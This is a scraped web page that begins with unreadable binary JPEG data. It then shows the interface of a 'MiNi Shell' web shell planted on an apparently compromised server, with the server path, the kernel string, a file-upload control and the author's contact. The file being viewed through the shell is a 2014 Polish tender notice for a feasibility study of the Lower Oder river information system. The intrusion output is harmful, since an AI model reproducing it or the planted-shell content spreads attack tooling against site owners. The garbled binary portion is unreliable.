JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141014/340514-N-2014.html

<p class="kh_header"><b>Szczecin: Studium Wykonalności dla Pełnego wdrożenia RIS.</b><br>
<b>Numer ogłoszenia: 340514 - 2014; data zamieszczenia: 14.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Żeglugi Śródlądowej , pl. Batorego 4, 70-207 Szczecin, woj. zachodniopomorskie, tel. 91 43 40 279, 44 03 354, faks 91 43 40 129.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczecin.uzs.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Studium Wykonalności dla Pełnego wdrożenia RIS..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis Przedmiotu Zamówienia
Przedmiotem zamówienia jest wykonanie usługi pn: Opracowanie Studium wykonalności Pełnego wdrożenia RIS Dolnej Odry, która jest pierwszym zadaniem II etapu budowy systemu informacji rzecznej RIS na Dolnej Odrze.  

I. W I etapie kompleksowego projektu, w ramach projektu Pilotażowe wdrożenie RIS Dolnej Odry
   (projekt współfinansowany z funduszu TEN-T (nr 2010-PL-70206-P) na mocy Decyzji Komisji
   Europejskiej z dnia 10.12.2012 r. nr C(2012)9020) wdrożono system na minimalnym, wymaganym
   przez Dyrektywę 2005/44/WE Parlamentu Europejskiej poziomie. Etap I podzielony został na 3 zadania
1. Zadanie nr 1 - opracowanie studium wykonalności oraz programu funkcjonalno-użytkowego
    pilotażowego wdrożenia RIS Dolnej  Odry,
2. Zadanie nr 2 - Pilotażowe wdrożenie RIS Dolnej Odry - w tym budowa Centrum RIS,.
3. Zadanie nr 3 - Weryfikacja realizacji pilotażu RIS Dolnej Odry

II. W II etapie realizacji kompleksowego projektu opracowane będą niezbędne dokumenty do rozbudowy
     systemu RIS. Etap ten podzielono na 3 zadania: 
1. opracowanie Studium Wykonalności Pełnego Wdrożenia RIS 
2. opracowanie dokumentacji technicznej, w tym miedzy innymi:
1) Programu Funkcjonalno-Użytkowego, 
2) projektu budowlany budynku Centrum RIS/Urzędu Żeglugi Śródlądowej w Szczecinie lub projekt
    przebudowy pomieszczeń biurowych na potrzeby UŻS w Szczecinie,
3) dokumentacji technicznej systemu RIS, w tym:
a. projekt podsystemu łączności VHF,  projekt podsystemu AIS, projekt podsystemu CTV,
b. projekt podsystemu radarowego - jeśli będzie konieczny
4) Decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia,
5) Raporty OOŚ - jeśli będzie to konieczne,
6) dokumentacji przetargowej na wykonanie prac, 
7) niezbędnych pozwoleń na budowę lub przebudowę - jeśli będzie to konieczne,
3. weryfikacja opracowanej dokumentacji i rozliczenie projektu. 

Wyniki tych prac zostaną wykorzystane do realizacji projektu Pełne wdrożenia RIS Dolnej Odry, w  przyszłej perspektywie finansowej UE 2014-2020. Projekt pełne wdrożenie RIS Dolnej Odry został wpisany na listę projektów śródlądowego transportu wodnego w Dokumencie Implementacyjnym do Strategii Rozwoju Transportu do 2020r. (z perspektywą do 2030r. ) (wersja z grudnia 2013r. - 6 miejsce wartość projektu 20 mln złotych).  Rozpoczęcie III etapu wyznaczono  na koniec IV kwartału 2015 roku natomiast  zakończenie  i rozliczenie całego etapu zaplanowano na II kwartał 2019 roku. 
III. Wykonanie Studium Wykonalności 
1. Studium Wykonalności musi zostać opracowane dla 3 wariantów:
1)	wariant pierwszy, który zakładać będzie powiększenie obszaru objętego systemem RIS o odcinek rzeki od m. Ognica do m. Hohensaaten, tj. o 30 km co pozwoli to utworzenie jednolitego szlaku żeglownego o tych samych parametrach jakościowych świadczenia informacji rzecznej na trasie Szczecin - Berlin. Wariant ten powinien także zawierać propozycje rozszerzenia funkcjonalności systemu o usługi wynikające z obowiązujących i obecnie procedowanych przepisów krajowych i międzynarodowych jak i międzynarodowych standardów opracowywanych przez międzynarodowo uznane grupy eksperckie. Ponadto w ramach opracowania należy zaproponować dostosowanie infrastruktury technicznej i biurowej oraz struktury zatrudnienia do nowego zakresu działania dla 8h, 16h i 24h (praca ciągła) trybu pracy Centrum RIS.
2)	wariant drugi, który zakładać będzie powiększenie obszaru objętego systemem RIS o cały dolny odcinek Odry, tj. od m. Kostrzyn do m. Ognica. Wariant ten musi zawierać szczegółową analizę stosowanych w Europie technologii i usług systemu RIS oraz uwzględniać obowiązujące i obecnie procedowane przepisy krajowe i międzynarodowe jak i międzynarodowe standardy opracowywane przez międzynarodowo uznane grupy eksperckie. Analiza ta powinna zawierać oprócz opisu i funkcji także korzyści i koszty wdrożenia każdej z technologii/usługi. Ponadto należy opracować propozycje dostosowania infrastruktury technicznej i biurowej oraz struktury zatrudnienia do nowych zadań dla 8h, 16h i 24h (praca ciągła) trybu pracy Centrum RIS. 
3)	wariant trzeci, który zakładać będzie powiększenie obszaru objętego systemem RIS o cały odcinek graniczny rzeki Odry, od ujścia Nysy Łużyckiej, tj. do 542,4 km rzeki do m. Ognica. Wariant ten musi zawierać szczegółową analizę stosowanych w Europie technologii i usług systemu RIS oraz uwzględniać obowiązujące i obecnie procedowane przepisy krajowe i międzynarodowe jak i międzynarodowe standardy opracowywane przez międzynarodowo uznane grupy eksperckie. Analiza ta powinna zawierać oprócz opisu i funkcji zawierać także korzyści i koszty wdrożenia każdej z technologii/usługi oraz propozycje dostosowania infrastruktury technicznej i biurowej (w tym budowę nowej siedziby Centrum RIS)  oraz struktury zatrudnienia do nowych zadań dla 8h, 16h i 24h (praca ciągła) trybu pracy Centrum RIS.
Szczegółowy opis przedmiotu zamówienia zawarty jest w RozdzialeXIV SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w  okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej jedną usługę, o wartości co najmniej 50 000 zł brutto, polegającą na opracowaniu dokumentacji (studium wykonalności, program funkcjonalno-użytkowy, specjalistyczne ekspertyzy w tym specyfikacje techniczne itp.) związane z projektowaniem systemów transportu.
Ocena spełnienia warunku będzie dokonana na zasadzie spełnia/nie spełnia na podstawie potwierdzających go dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub będzie dysponował przy wykonywaniu zamówienia osobami zdolnymi do wykonania zamówienia tj. Zespołem Ekspertów, składającym się z co najmniej 6 osób, które będą uczestniczyć w wykonaniu zamówienia w tym:
a. Kierownik zespołu - posiadający co najmniej 3 letnie doświadczenie zawodowe w zakresie zarządzania projektami badawczymi,   wdrożeniowymi,   informatycznymi   
b. Specjalista ds. studium wykonalności - posiadający co najmniej 3 letnie doświadczenie zawodowe zakresie opracowań Studium Wykonalności, w zakresie transportu, potwierdzonego wykonaniem co najmniej jednego studium wykonalności.
c. Specjalista ds. analityki finansowej i ekonomicznej - posiadający co najmniej 3 letnie doświadczenie zawodowym w zakresie opracowania analiz ekonomicznych i finansowych, potwierdzonego wykonaniem co najmniej jednej analizy ekonomiczno - finansowej
d. Specjalista ds. analizy środowiskowej - posiadający co najmniej 3 letnim doświadczenie zawodowe w zakresie przygotowywania dokumentacji związanej z analizą oddziaływania na środowisko, potwierdzonego wykonaniem co najmniej jednej analizy oddziaływania na środowisko,
e. Specjalista ds. infrastruktury nawigacyjnej - posiadający co najmniej 3 letnie doświadczenie zawodowe związane z realizacją projektów dotyczących infrastruktury nawigacyjnej (projektowanie infrastruktury sensorów systemów nadzoru i monitorowania ruchu morskiego), potwierdzonego wykonaniem co najmniej jednego wykonanego projektu infrastruktury nawigacyjnej
f. Specjalista ds. projektów telekomunikacyjnych - posiadający wykształcenie wyższe na kierunku: elektronika i telekomunikacja w specjalności z zakresu telekomunikacji lub elektrotechnika w specjalności z zakresu telekomunikacji
            g. Specjalista ds. budowlanych w specjalności konstrukcyjno-budowlanej - posiadający
wykształcenie wyższe techniczne budowlane,
Ocena spełnienia warunku będzie dokonana na zasadzie spełnia/nie spełnia na podstawie potwierdzających go dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Odpowiednie pełnomocnictwa</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczecin.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Żeglugi Śródlądowej w Szczecinie, pl. Stefana Batorego 4, pok. nr 29..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2014 godzina 09:30, miejsce: Urząd Żeglugi Śródlądowej w Szczecinie, pl. Stefana Batorego 4, pok. nr 29..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Infrastruktura i Środowisko - działanie 7.5 priorytet 7
Finansowanie w wysokosci 85 % przez Unię Europejską.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com